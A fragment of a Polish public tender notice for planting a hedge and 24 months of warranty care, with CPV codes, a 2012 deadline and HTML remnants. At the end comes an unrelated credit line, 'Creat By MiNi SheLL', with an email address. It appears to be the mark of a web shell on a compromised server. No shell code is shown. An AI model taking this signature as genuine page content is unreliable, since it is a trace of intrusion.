	I.	sadzenie żywopłotu to dostarczenie roślin na miejsce sadzenia, wyznaczenie miejsc sadzenia, wykopanie dołów, zalanie wodą, całkowite zaprawienie dołów ziemią urodzajną (należy użyć żyznej gleby o odczynie pH 4,5 - 5,5), podlanie krzewów, wykonanie misy i wymulczowanie korą (warstwa grubości 8 cm),
	J.	pielęgnacja gwarancyjna to w okresie 24 miesięcy od daty odbioru prac:
		-  odchwaszczanie mis,
		-  podlewanie wg potrzeb,
		-  zwalczanie chorób i szkodników,
		-  cięcia sanitarne,
		-  wymiana chorych lub martwych roślin, przy czym okres gwarancji 
		   rozpocznie swój bieg od dnia pisemnego potwierdzenia wymiany rośliny
                 przez Zamawiającego; 
		-  inne zabiegi niezbędne do zachowania roślin w dobrej kondycji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.31.30.00-7, 77.31.00.00-6, 77.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com